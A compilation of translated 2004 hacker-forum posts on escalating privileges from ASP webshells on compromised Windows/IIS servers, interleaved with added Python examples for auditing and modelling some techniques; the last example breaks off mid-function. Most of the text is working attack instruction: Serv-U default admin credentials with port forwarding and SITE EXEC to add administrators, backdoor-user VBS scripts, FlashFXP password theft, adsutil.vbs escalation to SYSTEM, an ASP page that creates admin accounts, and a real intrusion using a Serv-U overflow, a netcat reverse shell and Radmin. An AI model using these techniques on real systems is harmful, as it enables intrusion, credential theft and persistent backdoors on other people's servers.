On escalating privileges from ASP trojans

xiaoxiao2021-03-06  16

Source:

http://www.17nc.com/

ASP trojans are everywhere now. On one box I went through recently I found more than 30 different ASP trojans; helping the administrator clean them up was exhausting. Thinking about it, that administrator really was lazy...

After uploading an ASP trojan, if all you want to do is change the home page or delete files, there is no need to escalate privileges. But if you want to do more than that, an ASP trojan alone is of little use; most web servers only let you browse the website directory, you can't even see the C drive, let alone escalate privileges or run a trojan.

There are many ways to escalate privileges, but I haven't found a universal one. Whether escalation succeeds depends far too much on how the site is configured. I'm collecting the methods here now, and I hope one day there will be a universal method. Tell me if you find one!

But then again, that would make running a website even harder, hehe...

This post has been edited by the author at 2004-12-25 20:53:58]

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:49:19

-

WebShell privilege escalation

With all the vulnerabilities leaked online, I'm sure everyone has collected plenty of broilers (compromised hosts), but they are all just WebShells; you can't get system privileges from them. So how do you get system privileges? That is exactly what we'll discuss this time.

OK, let's enter my WebShell.

Ah, nice, dual CPUs, so it should be fast. How could I not take this one?

Enter the password and take a look around. Nothing much on the site; it seems there is nothing special. Let's see whether we can reach the other drive letters. Click the C drive: not bad, we can get in. That makes escalation easier.

Serv-U escalation

OK, let's see what programs are in his Program Files. Oh, there is Serv-U. I remember Serv-U has a default username and password, and its admin listener is on port 43958, but it only accepts local connections. We have port-forwarding tools, though, so no worry. First let's see which version of Serv-U he runs: telnet xxx.xxx.xxx.xxx 21

It actually reports 3.0; hehe, I have to say this administrator really doesn't know much. Later I scanned it, and only the FTP hole was unpatched. That being the case, let's start our privilege escalation.

Upload fpipe, the port-forwarding tool (Figure 3).

Run d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1, which forwards port 43958 of that machine to port 81.

Then open Serv-U on our own machine, click "Serv-U Servers", click "Server" on the menu bar, click "New Server", enter the IP and the port (remember the port is 81, the one we just forwarded), and give it whatever server name you like. Then enter username: LocalAdministrator, password: #l@$ak#.lk;0@P (that whole string is the password).

Click OK, then click the server you just created and you can see the existing users. Create a new user and give it all permissions; don't lock it to its home directory.

Next, log in. The FTP login must be done from CMD; after the usual login commands, add a user:

ftp> quote site exec net.exe user hk pass /add

ftp> quote site exec net.exe localgroup administrators hk /add

If the other side has 3389 open, I don't need to teach you what comes next. If it's not open, create an IPC$ connection and run a trojan or a tool that opens 3389.

2. Autorun.inf plus shell.vbs

Autorun.inf:

[autorun]
open=shell.vbs

shell.vbs:

Dim wsh
Set wsh = CreateObject("WScript.Shell")
wsh.Run "net user guest /active:yes", 0
wsh.Run "net user guest 520LS", 0
wsh.Run "net localgroup administrators guest /add", 0
wsh.Run "net user hkbme 520LS /add", 0
wsh.Run "net localgroup administrators hkbme /add", 0
wsh.Run "cmd.exe /c del autorun.inf", 0
wsh.Run "cmd.exe /c del shell.vbs", 0

But this requires access to the root of the other side's drive: put these two files in the root of the other side's hard disk. Of course you can also run a trojan directly instead; upload a trojan and use the same kind of statement as the last two lines to run it through CMD.

3. Folder.htt with Desktop.ini

Rewrite Folder.htt together with Desktop.ini, and put your trojan or VBS or whatever into the directory the other side is most likely to browse. If you feel that's not enough, put them in a few more directories.

Add the code to Folder.htt.

However, the backdoor and these two files must be put in the same place. One small issue: this can start the VBS, and after it runs it deletes the uploaded files. It is written as codebase="shell.vbs".

4. Replace

Another method: replace a file that is being executed. This can get you privileges almost immediately, but I haven't done it myself; you can try it. Replace the file the other side is executing with one of the same name, bundled with a trojan. Why not just replace it with the trojan? If you replace a critical program, won't the machine hang right away? So bundle instead.

Format:

REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W] [/U]

[drive1:][path1]filename  Specifies the source file or files.
[drive2:][path2]          Specifies the directory where files are to be replaced.
/A  Adds new files to the destination directory. Cannot be used with the /S or /U switches.
/P  Prompts for confirmation before replacing a file or adding a source file.
/R  Replaces read-only files as well as unprotected files.
/S  Replaces files in all subdirectories of the destination directory. Cannot be used with the /A switch.
/W  Waits for you to insert a disk before beginning.
/U  Replaces (updates) only files that are older than the source files. Cannot be used with the /A switch.

I haven't tried this command; it is meant for files under folders you cannot access. Everyone can test it.

5. Scripts

Write a startup/shutdown script configuration file, Scripts.ini; this file name is fixed and cannot be changed. Its content is as follows:

[Startup]
0CmdLine=a.bat
0Parameters=

Save Scripts.ini to C:\WINNT\System32\GroupPolicy\Machine\Scripts

a.bat can contain net user <username> <password>

or net user administrator xxx

This lets you reset the password of any user you want, and you can also add new users, but it relies on a reboot and on System32 being writable.

6. SAM

If you can access the other side's SYSTEM32, remove his SAM file; after he reboots, the admin password is empty.

Suddenly I have an idea: can this be done with the replace command? Extract your own SAM file, upload it to any directory of his, and then replace. But I don't know whether replace can still replace it when I have no permissions on System32.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:51:04

-

Using FlashFXP to escalate privileges

Recently I got a lot of broilers :) Some people are very busy, and everyone's method is just to use an ASP script backdoor. As for escalating privileges, few people can do it in one breath. The key is that escalation is the hard part: many servers are configured very strangely, your ASP trojan may not even work, let alone escalation. The WebShell we get has the privileges of a low-level user. The various escalation methods are all over the place; everyone has their own tricks.

First, if a pcAnywhere server is installed on the server, the administrator has made it convenient for us: take the files under Documents and Settings\All Users\Application Data\Symantec\pcAnywhere, crack them, and use pcAnywhere to connect. OK.

Second, if the other side has Serv-U, no need to say more: by modifying ServUDaemon.ini and using fpipe, escalating through this software should not be a problem.

Third, escalate by replacing system services.

Fourth, look for the conn and config files to see whether the SA or MySQL password can be harvested.

I found this method during a boring intrusion: using FlashFXP to escalate privileges. The success rate depends on your luck though :)

I got a WebShell through the BBS at www.xxx.com and put in a pony (the famous one's name is too big now and I didn't dare use it; I split one piece of code into n files, heh). I didn't have time to escalate. When I got home I saw, to my dizziness, that the BBS had been upgraded to Dvbbs SP2 and my pony had been killed; the BBS was the Access version. Depressed! Suddenly I remembered that I had inserted an ASP backdoor into a page; let's see if there is still hope. Enter www.xxx.com/xx.asp?id=1. Good guy, still there! Happy-ing (Figure 1).

So I uploaded an ASP backdoor. How to escalate privileges?

I wandered around this website's host for n minutes and found a FlashFXP folder under C:\Program Files (those who use this software like me will know it) (Figure 2). Then I looked at the file Sites.dat (edit): this is where the usernames and passwords are, and the passwords are encrypted.

What if I download these files and replace my corresponding local files with them?

So I downloaded Sites.dat, Sites.dat.bak, Stats.dat and Stats.dat.bak to my computer and replaced the corresponding files in my FlashFXP folder. Open FlashFXP, open the site manager. Well well, what a find.

The other side's sites are all there (Figure 3): every site he had connected to with FlashFXP. Through this we got a bunch of broilers, with FTP privileges. Upload script trojans ~ huh huh.

I've been talking for a long time and still haven't talked about escalating privileges.

Don't worry. Look at the other side's site manager: it has the username and password, but the password is shown as asterisks. What a pity!

Also, remember the passwords and usernames in Sites.dat: the passwords are encrypted.

Now the asterisks are encrypted too. Look, and you'll see.

How to see them? The rookies have a good tool, the XP Asterisk Password Viewer, and you can compare with the password seen in Sites.dat. Comparing Figure 4 and Figure 5, it is obvious that the password seen in the site manager is shown in plaintext. Struck gold!

The next step is to use the XP Asterisk Password Viewer to extract the passwords and usernames. Seeing such complex passwords in the viewer really makes me miss the days of sniffing. Haha.

The passwords are: b69ujkq6 Hyndai790 S584P*FV4-C 98CQ3JK4 3-8*EF./2Z5

The usernames are: BN7865T Nilei75 QM/-G57 3KN QM/-G57 3KN 5.e*82/69

(The passwords and usernames above have been modified where necessary.)

With so much information, according to social engineering, there's no way the administrator's password isn't in there. I don't believe it. In the end I did get this website's administrator password out of that pile.

I think this issue should be reported to FlashFXP officially so they can correct this vulnerability or bug in the next release. Later testing showed that simply replacing your local Sites.dat, which holds the passwords and usernames, with the other side's file restores the password of each of his sites. I hope that when you encounter FlashFXP you'll think of this method; at the very least you'll get a pile of new broilers. Why not try? I hope it helps us all.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:52:16

-

Raising ASP privileges to the highest. By: cnqing. From:

http://friend.91eb.com

Originally I wanted to write a dedicated ASP trojan, but unfortunately I don't have enough time or skill. So let me first tell you the principle and the method. It's simple; there's no need to say much, you'll understand it.

Principle:

ASP files are run by asp.dll, which is started by dllhost.exe with the identity IWAM_<machinename>. If you put asp.dll into InProcessIsapiApps, it is started directly by inetinfo.exe, whose identity is SYSTEM.

Method:

Step 1. Get the contents of InProcessIsapiApps with the command "cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps". A list of DLLs will be returned; copy it.

Step 2. Write a .bat containing "cscript c:\inetpub\adminscripts\adsutil.vbs set w3svc/InProcessIsapiApps "c:\inetpub\adminscripts\asp.dll" ..." where the omitted part is the list you copied. Do not insert line breaks; separate the entries with spaces.

Finally, run this .bat.

For example:

With "cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps" I obtained:

"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\msw3prt.dll"
"c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_aut\author.dll"
"c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_adm\admin.dll"
"c:\program files\common files\microsoft shared\web server extensions\isapi\shtml.dll"

Then your .bat should be:

cscript c:\inetpub\adminscripts\adsutil.vbs set w3svc/InProcessIsapiApps "c:\inetpub\adminscripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll" "c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_aut\author.dll" "c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_adm\admin.dll" "c:\program files\common files\microsoft shared\web server extensions\isapi\shtml.dll"

Tested!!

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 19:53:18

-

Bypassing authentication with %5C

---------------------------------------

Lake2

http://mrhupo.126.com

2004-11-27

---------------------------------------

Speaking of %5C, you probably think of the currently popular %5C database-exposure trick (暴库); this article is an exploration of %5C (and of course of something new I'm proposing; maybe it will help you ^_^).

OK, let's trace it back to the roots and find the origin of this vulnerability. Look at the NSFocus advisory from 2001:

http://www.nsfocus.net/index.php?ac...iew&bug_id=1429

N years ago this vulnerability could be used for directory traversal. Although Microsoft released a patch, it seems the patch only restricts IIS to the virtual directory, so the vulnerability still exists, just in a limited form: for IIS, submitting a URL containing %5C still finds the file, but other files that the file references are not found (%5C is the URL encoding of \, so IIS goes up to the parent directory to look for them and of course can't find them; dizzy, haha, I'm dizzy).

Later some experts dug into this vulnerability and produced the legendary %5C database-exposure trick: because the database is referenced with a relative path, after submitting %5C the file cannot be found, so IIS honestly reports the path of the database (don't understand? Go look it up on Google).

By chance I found that %5C can also be used to bypass ASP authentication; try it when database exposure fails.

Without further ado, look at the following code:

<%
guest_user = Trim(Request("guest_user"))
guest_password = Trim(Request("guest_password"))
Set rs = Server.CreateObject("ADODB.Recordset")
sql = "select * from admin where id=1"
rs.Open sql, conn, 3, 2
readuser = rs("guest_user")
readpassword = rs("guest_password")
If readuser <> guest_user Or readpassword <> guest_password Then
    Response.Write "Please enter the correct administrator password!"
    Response.End
Else
    Session("admin") = 1  ' after logging in, save the session
    Response.Write("Login successful, please return to the information page")
End If
%>

See? To pass verification you have to submit the username and password that are in the database. What? Let's look at the database connection file's code:

<%
On Error Resume Next
Set conn = Server.CreateObject("ADODB.Connection")
dbpath = Server.MapPath("guestbook.asp")
conn.Open "Driver={Microsoft Access Driver (*.mdb)};dbq=" & dbpath
%>

Ah, there is an error-tolerance statement; isn't that a treasure? Wait: if we submit %5C the database can't be found, but because of the error tolerance the program keeps going, and then the username and password it reads from the database are empty (think of it: sometimes database exposure fails and you just see an empty frame, because the data is empty). Haha, so we bypass the verification!

Knowing how it works: save the login page locally, modify the URL it submits to, change the last / to %5c, enter a space for the username and the password (some programs check whether the username and password are empty; the space is then filtered out by the program), submit, OK.

Hey, don't think I made the code up out of nothing. This is actually a guestbook program written by our school, hanging right on the school's home page, huh huh.

Having understood the principle, of course I had to look for a real vulnerability, naturally in the famous, hole-ridden Dvbbs forum. But it failed, because it has this passage:

If Err Then
    Err.Clear
    Set conn = Nothing
    Response.Write "Database connection error, please check the connection string."
    Response.End
End If

When the database isn't found, huh huh, you get nothing.

Then I downloaded the BBSXP forum and opened its database connection file; dizzy, there is no error-tolerance statement at all; huh, but at least you can dump its database.

I'm not perverse, so I won't look any further; I'll write the article and leave it to you masters. To summarize, the conditions for this attack: 1. the database connection uses a relative path and has only a simple error-tolerance statement; 2. the server's IIS version is 4 or 5; 3. the program does not check for empty input, or it checks but filters spaces before comparing; 4. the program cannot be in the top-level directory.

As for prevention, huh, since the attack conditions are known, the countermeasures follow naturally ^_^

-------------------------------------------------- ------------------------------
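The bypass Lake2 describes can be modelled offline. The Python below is an added example, not code from the post or from the guestbook program it mentions: it models the login page and the connection file as functions (the admin row and the form submissions are constructed for the demo), builds the %5C URL the post describes, and shows the bypass succeeding against the vulnerable logic and failing against a fail-closed version. The URL, the row contents and the function names are assumptions of the example.

```python
"""Added example (not from the post): model of the %5C login bypass.

The ASP page reads guest_user/guest_password from a recordset; when the
relative dbq path breaks, On Error Resume Next hides the failure and every
field read returns "". The constructed data below stands in for the .mdb.
"""
from urllib.parse import urlsplit, urlunsplit

# Constructed sample row, standing in for "select * from admin where id=1".
ADMIN_ROW = {"guest_user": "admin", "guest_password": "s3cret"}


def percent_5c_url(url: str) -> str:
    """Replace the last '/' of the path with '%5C' as the post describes.

    IIS 4/5 treat the encoded backslash as a separator, so the script is
    still served while the relative paths inside it (the .mdb) resolve
    against the wrong directory. A script in the top-level directory has
    no '/' to rewrite (condition 4 of the post), so that case is rejected.
    """
    parts = urlsplit(url)
    cut = parts.path.rfind("/")
    if cut <= 0:
        raise ValueError("script must sit below the top-level directory")
    new_path = parts.path[:cut] + "%5C" + parts.path[cut + 1:]
    return urlunsplit(parts._replace(path=new_path))


def open_admin_row(db_reachable: bool, on_error_resume_next: bool) -> dict:
    """Model of the connection file plus the recordset read.

    With On Error Resume Next a failed conn.Open is swallowed and the later
    rs("...") reads come back empty; without it the error propagates.
    """
    if db_reachable:
        return dict(ADMIN_ROW)
    if on_error_resume_next:
        return {"guest_user": "", "guest_password": ""}
    raise RuntimeError("Database connection error")


def vulnerable_login(form: dict, db_reachable: bool) -> bool:
    """Faithful model of the vulnerable page: Trim() then a plain <> compare."""
    guest_user = form.get("guest_user", "").strip()        # Trim(Request(...))
    guest_password = form.get("guest_password", "").strip()
    row = open_admin_row(db_reachable, on_error_resume_next=True)
    if row["guest_user"] != guest_user or row["guest_password"] != guest_password:
        return False
    return True  # Session("admin") = 1


def hardened_login(form: dict, db_reachable: bool) -> bool:
    """Fail closed: reject empty credentials and treat a DB error as denial."""
    guest_user = form.get("guest_user", "").strip()
    guest_password = form.get("guest_password", "").strip()
    if not guest_user or not guest_password:
        return False
    try:
        row = open_admin_row(db_reachable, on_error_resume_next=False)
    except RuntimeError:
        return False
    # An empty stored credential means the row was never read; never match it.
    if not row["guest_user"] or not row["guest_password"]:
        return False
    return row["guest_user"] == guest_user and row["guest_password"] == guest_password


if __name__ == "__main__":
    blank = {"guest_user": " ", "guest_password": " "}  # spaces pass an is-empty check
    print(percent_5c_url("http://www.example.com/guestbook/login.asp?id=1"))
    print("vulnerable, db unreachable:", vulnerable_login(blank, db_reachable=False))
    print("hardened,   db unreachable:", hardened_login(blank, db_reachable=False))
```

The space-then-Trim detail matters: a form that rejects empty fields still lets a single space through, and Trim() turns it into the empty string that the unreadable recordset also yields. The hardened variant checks emptiness after trimming and refuses to compare against an empty stored credential, so even a swallowed connection error cannot produce a match.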

- Author: vjoy

- Published: 2004-12-25 19:57:36

-

Add a super user .asp code [original by Blue Screen, improved by Kevin, unpublished MS vulnerability]

Author: Blue Screen, Kevin. Source: Freezing Limit

Actually, last week Kevin and I tested this on my broiler, together with the Hippo epic. The result was that a user was successfully added to the Administrators group under USER privileges (although I couldn't believe my eyes).

Last time Kevin didn't say anything, so I didn't dare release it... Now that I've seen it on his blog, here it is (it has also been improved a bit over what I tested last time: a form was added). Good luck everyone.

Anyway the code is right, but very few succeed; it depends on luck. Oh, next I want to integrate it into the Ocean. Hehe.

.Network object script privilege-escalation vulnerability exploitation tool

(form fields) User: / Password:

<%@ codepage=936 %>
<%
On Error Resume Next
If Request.ServerVariables("REMOTE_ADDR") <> "127.0.0.1" Then
    Response.Write "IP !s N0T Right"
Else
    If Request("username") <> "" Then
        username = Request("username")
        passwd = Request("passwd")
        Response.Expires = 0
        Session.Timeout = 50
        Server.ScriptTimeout = 3000
        ' ADSI WinNT provider bound to the local machine
        Set lp = Server.CreateObject("WScript.Network")
        oz = "WinNT://" & lp.ComputerName
        Set ob = GetObject(oz)
        Set oe = GetObject(oz & "/administrators,group")
        ' create the account and add it to the local Administrators group
        Set od = ob.Create("user", username)
        od.SetPassword passwd
        od.SetInfo
        oe.Add oz & "/" & username
        If Err Then
            Response.Write "~~ Don't buy 6+1 today... 2 yuan buys a bottle and you can be happy..."
        Else
            ' verify with "net user": an existing account lists its "Last logon"
            If InStr(CreateObject("WScript.Shell").Exec("cmd.exe /c net user " & username).StdOut.ReadAll, "Last logon") = 0 Then
                Response.Write "Although there was no error, it seems the account was not created. You must be very depressed."
            Else
                Response.Write "OMG! " & username & " account was actually created! This is an unknown vulnerability. 5,000,000 RMB is yours"
            End If
        End If
    Else
        Response.Write "Please enter the user name"
    End If
End If
%>

Escalating privileges while bypassing the firewall

The focus of this article is WebShell privilege escalation and bypassing firewalls.

Without wasting words, let's get to the topic.

First determine the target:

http://www.sun**.com, a common virtual host. Using the upfile vulnerability, I believe getting a WebShell is not hard for anyone. The WebShell we got this time was not from Dvbbs but from the lax upload filtering of the Free Power 3.6 software. The website

http://www.sun**.com/lemon/index.asp is a Free Power 3.6 article system. XR used WinHex.exe and WSockExpert.exe to upload a web trojan, newmm.asp; anyone who has done the Door.exe trick knows this is how the ASP trojan content is uploaded. So we uploaded Ocean 2005a and successfully got a WebShell.

Test the privileges: run SET in CMD to get some information about the host. The system disk is D, and the WebShell has execute permission. Then let's see what's on C. Is it a dual-boot system? After browsing, no system files, only some junk files; fainting. Never mind, check again: the virtual host has Serv-U, as expected, version 5.0.0.8. Oh, there is a local overflow for it, haha.

Idea: upload the Serv-U local overflow exploit srv.exe and nc.exe, and use nc to reverse-connect to get a system shell. Everyone finds that uploading with the Ocean 2005a component isn't easy (anyway I always hit this problem); no matter, use Rain's upload component, three files in total: up.htm, upload.asp and uploadclass.asp. Upload upload.asp and uploadclass.asp to the same folder; up.htm is used locally. Modify the link address in up.htm to:

http://www.sun**.com/lemon/upload.asp and you can upload.

After uploading srv.exe and nc.exe to h:\long\sun***\lemon (the website directory), we found there was no execute permission. Never mind; from experience, D:\Documents and Settings\All Users\ generally has execute permission. So I wanted to copy the files there, but found that our WebShell had no write permission on the D drive; fainted.

You can browse D:\Program Files\Serv-U\ServUDaemon.ini but can't change it. Crack the Serv-U password? Dizzy, no way. With nothing else to try, I suddenly wondered why the system wasn't on the C drive: is C a FAT32 partition? (Later events proved our guess. If a host has a Win98 system disk, 99% of the time it is FAT32. We have also met hosts with Ghost: to back up under DOS, the backup disk is generally a FAT partition.) If the system disk is FAT32, the website has no security at all. Although C isn't the system disk, we have execute permission on it. Oh, copy srv.exe and nc.exe to C:\ and run srv.exe "nc.exe -e cmd.exe 202.*.*.* 888", where 202.*.*.* is our broiler; before this we ran nc -l -p 888 on the broiler. We are on an intranet with no public IP, unhappy-ing.

We successfully got a system shell back on the broiler. (It seems simple; in fact we hit setbacks. We found that some versions of nc actually have no -e, and we had thought every nc in the world was the same. Later I also found that different versions of nc don't interconnect properly; you get garbage and there's nothing to be done. For this we uploaded n times, got it wrong n times, were stupid n times, and finally succeeded. Being a hacker really takes patience and perseverance.)

Happy, but we still weren't satisfied, because this shell is too slow. So I wanted to use our most common Radmin; actually the administrator can press Ctrl+Alt+Del and find r_server in the process list, but I still like it because it won't be killed. OK, upload AdmDll.dll, raddrv.dll and r_server.exe to h:\long\sun***\lemon, use the shell we got with nc to copy them to D:\WINNT\System32\, then run: r_server /install, net start r_server, r_server /pass:ras /save.

A long wait, and finally it showed success. Went to connect with Radmin and found the connection failed. Dizzy, forgot about the firewall. Uploaded pslist and pskill and found BlackICE, a trojan killer and the like. Kill them and we could log in, but then the server still wouldn't last long. The firewall doesn't block ports 21 and 80, so our thoughts return to Serv-U. Download his ServUDaemon.ini, overwrite our own machine's ServUDaemon.ini with it, and in our own Serv-U add a username XR with password rain and all permissions. The old way: upload it, writing to D:\Program Files\Serv-U\ and overwriting the original ServUDaemon.ini. Although we waited n long, it succeeded, so I used FlashFXP, and got a 530 error. Depressed; why did it fail? (From experience it should work, but I don't know why it didn't; please advise.)

Whatever; restarting Serv-U should do it. How to restart? First I thought of using shutdown to restart the system, but then we'd lose the nc shell and might be discovered. Then my eyes lit up: don't we have pskill? I found the process with pslist: ServUDaemon. Kill it. Then run D:\Program Files\Serv-U\ServUAdmin.exe; note it is not ServUDaemon.exe here. OK, that's it, let's go straight in: ls, haha, the system is in my hands. Can we run system commands? Yes, like this:

ftp> quote site exec net user xr rain /add

Run net user from the WebShell and you can see it succeeded.

The whole intrusion went like this; afterwards we discussed it for a while. In fact there are many good rootkits for breaking through firewalls, but we feel that what comes with the service itself is the safest, hehe.

-------------------------------------------------- ------------------------------
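The Serv-U configuration that both this post and the earlier WebShell post tamper with (a user whose directory access carries the Execute flag so SITE EXEC can run net.exe, often with Maintenance=System as well) can be checked straight from the ini file. The Python below is an added example, not code from either post: it parses a constructed ServUDaemon.ini in the [USER=name|1] layout Serv-U 5 writes and reports which accounts could run programs through an FTP session. The user names, password hashes, paths and the port value are constructed; only the R/W/E flag letters are interpreted, the other letters are an assumption left alone.

```python
"""Added example (not the posts' own code): audit a Serv-U 5.x ServUDaemon.ini.

Both posts rely on a user entry with the Execute flag (so SITE EXEC can run
net.exe) and often Maintenance=System. The ini text below is constructed for
the demo and mimics the [USER=name|1] sections Serv-U 5 writes; only the
R/W/E flag letters are relied on, the other letters are not interpreted.
"""
import re

SAMPLE_INI = """\
[GLOBAL]
Version=5.0.0.8
LocalSetupPortNo=43958
[DOMAINS]
Domain1=0.0.0.0||21|Domain|1|0|0
[Domain1]
User1=webftp|1|0
User2=xr|1|0
[USER=webftp|1]
Password=ah12d2b6f70fd4c1a0e3c54a0f1c0e9a7c
HomeDir=h:\\long\\sun\\lemon
AlwaysAllowLogin=1
Access1=h:\\long\\sun\\lemon|RWAMLCDP
[USER=xr|1]
Password=ah6b3e0f1d8a5c2e4b7f9c1d3e5a7b9c2d
HomeDir=c:\\
AlwaysAllowLogin=1
Maintenance=System
Access1=c:\\|RWAMELCDP
Access2=d:\\|RWAMELCDP
"""

DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")


def parse_servu_ini(text: str) -> dict:
    """Minimal INI reader: {section: {key: value}}; keeps key case."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip()] = value.strip()
    return sections


def audit_users(sections: dict) -> dict:
    """Per user, list the settings that turn an FTP login into code execution."""
    report = {}
    for name, entries in sections.items():
        if not name.upper().startswith("USER="):
            continue
        user = name[len("USER="):].split("|", 1)[0]
        findings = []
        if entries.get("Maintenance", "None").lower() == "system":
            findings.append("Maintenance=System: full Serv-U administration from an FTP session")
        for key in sorted(k for k in entries if k.startswith("Access")):
            path, _, flags = entries[key].partition("|")
            flags = flags.upper()
            if "E" in flags:
                findings.append(f"Execute flag on {path}: SITE EXEC can run programs there")
            if "W" in flags and DRIVE_ROOT.match(path):
                findings.append(f"Write access at drive root {path}")
        report[user] = findings
    return report


def admin_port(sections: dict) -> int:
    """Local admin listener (default 43958, 127.0.0.1 only, hence fpipe in the post)."""
    return int(sections.get("GLOBAL", {}).get("LocalSetupPortNo", "43958"))


if __name__ == "__main__":
    cfg = parse_servu_ini(SAMPLE_INI)
    print("admin port:", admin_port(cfg))
    for user, findings in audit_users(cfg).items():
        print(user, "->", findings or ["nothing dangerous"])
```

Run against a real ServUDaemon.ini, the same checks show whether a web-writable ini (the D:\Program Files\Serv-U\ overwrite in the post) has gained an account like XR; an entry such as Access1=c:\|RWAMELCDP on a fresh user is exactly what the post plants.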

- Author: vjoy

- Release time: 2004-12-25 20:35:14

-

Escalating privileges by making asp.dll run as SYSTEM

There are two traditional escalation methods on the net:

1. In the GUI, set Default Web Site -> Home Directory -> Application Protection to Low; this gives ASP SYSTEM privileges.

But this method is easily discovered, so there is another one: generally adsutil.vbs is used to escalate. And that is what I'll talk about today: escalating privileges with adsutil.vbs.

2. Do it with adsutil.vbs.

I've seen a lot of videos and articles that teach this method, but none that explain the principle, so let me give my personal view:

First an example:

There is a pack of dogs, and in this pack a few old dogs have supreme privileges, while the other dogs have pitifully few.

Back to the computer:

In IIS there are several DLL files that have privileges. We can think of SYSTEM privilege as being like the old lead dogs. asp.dll, which runs ASP, is like an ordinary dog; its privileges are just that small.

So if asp.dll becomes a lead dog, doesn't ASP then have system privileges? That's all there is to it. So our idea is to add asp.dll to the privileged DLL family. The escalation steps are:

<1> See which DLLs are privileged.

<2> Add asp.dll to the privileged set.

OK, let's walk through the process.

1) View the DLL files with privileges:

The command is: cscript adsutil.vbs get /w3svc/InProcessIsapiApps

The output is:

C:\Inetpub\AdminScripts>cscript adsutil.vbs get /w3svc/InProcessIsapiApps
Microsoft (R) Windows Script Host Version 5.1 for Windows
Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps              : (LIST) (5 Items)
  "C:\WINNT\system32\idq.dll"
  "C:\WINNT\system32\inetsrv\httpext.dll"
  "C:\WINNT\system32\inetsrv\httpodbc.dll"
  "C:\WINNT\system32\inetsrv\ssinc.dll"
  "C:\WINNT\system32\msw3prt.dll"

See? This tells us the privileged family here is: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

These files may differ from machine to machine.

2) Add asp.dll to the privileged family:

Because asp.dll lives at C:\WINNT\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine)

we now run: cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\WINNT\system32\inetsrv\asp.dll"

OK, now you can use cscript adsutil.vbs get /w3svc/InProcessIsapiApps to check whether it was added.

Note the usage of get and set: one views, the other sets. Also, you need to change to the directory C:\Inetpub\AdminScripts> first.

So, if you are an administrator and your machine has been hit with this trick to raise ASP to SYSTEM privileges, the way to strip asp.dll of its privilege is to use the set command again and overwrite the list with the original entries.

Example: cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll"

That's it. When you run cscript adsutil.vbs get /w3svc/InProcessIsapiApps and no longer see asp.dll,

ASP's privileges are back to what they were before.

-------------------------------------------------- ------------------------------
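Both adsutil.vbs posts (cnqing's earlier one and the one just above) end with a SET command that has to re-list every DLL by hand, and the defensive check is the same GET listing read backwards. The Python below is an added example, not code from either post: it parses a constructed copy of the GET listing in the shape shown above (with asp.dll already appended the way the escalation leaves it), flags asp.dll, and builds the SET command that restores the original list. The adsutil.vbs path, the listing and the engine list are assumptions of the example; nothing here talks to the IIS metabase.

```python
"""Added example (not from either adsutil post): parse an adsutil GET listing,
flag asp.dll in InProcessIsapiApps, and build the SET command that removes it.

SAMPLE_GET_OUTPUT is a constructed listing in the shape shown above, with
asp.dll already appended the way the escalation does. The path to adsutil.vbs
and the engine list are assumptions of the example.
"""
import re

SAMPLE_GET_OUTPUT = """\
Microsoft (R) Windows Script Host Version 5.1 for Windows
Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps              : (LIST) (6 Items)
  "C:\\WINNT\\system32\\idq.dll"
  "C:\\WINNT\\system32\\inetsrv\\httpext.dll"
  "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"
  "C:\\WINNT\\system32\\inetsrv\\ssinc.dll"
  "C:\\WINNT\\system32\\msw3prt.dll"
  "C:\\WINNT\\system32\\inetsrv\\asp.dll"
"""

QUOTED_PATH = re.compile(r'"([^"]+)"')
ITEM_COUNT = re.compile(r"\((\d+) Items?\)", re.IGNORECASE)

# Script engines that must stay out of process (inetinfo.exe runs as SYSTEM).
SCRIPT_ENGINES = ("asp.dll",)


def parse_inprocess_list(output: str) -> list:
    """Return the quoted DLL paths, checking them against the declared count."""
    paths = QUOTED_PATH.findall(output)
    m = ITEM_COUNT.search(output)
    if m and int(m.group(1)) != len(paths):
        raise ValueError(f"listing declares {m.group(1)} items but shows {len(paths)}")
    return paths


def find_script_engines(paths: list) -> list:
    """Entries whose file name is one of SCRIPT_ENGINES (case-insensitive)."""
    return [p for p in paths if p.rsplit("\\", 1)[-1].lower() in SCRIPT_ENGINES]


def build_set_command(paths: list, adsutil: str = r"C:\Inetpub\AdminScripts\adsutil.vbs") -> str:
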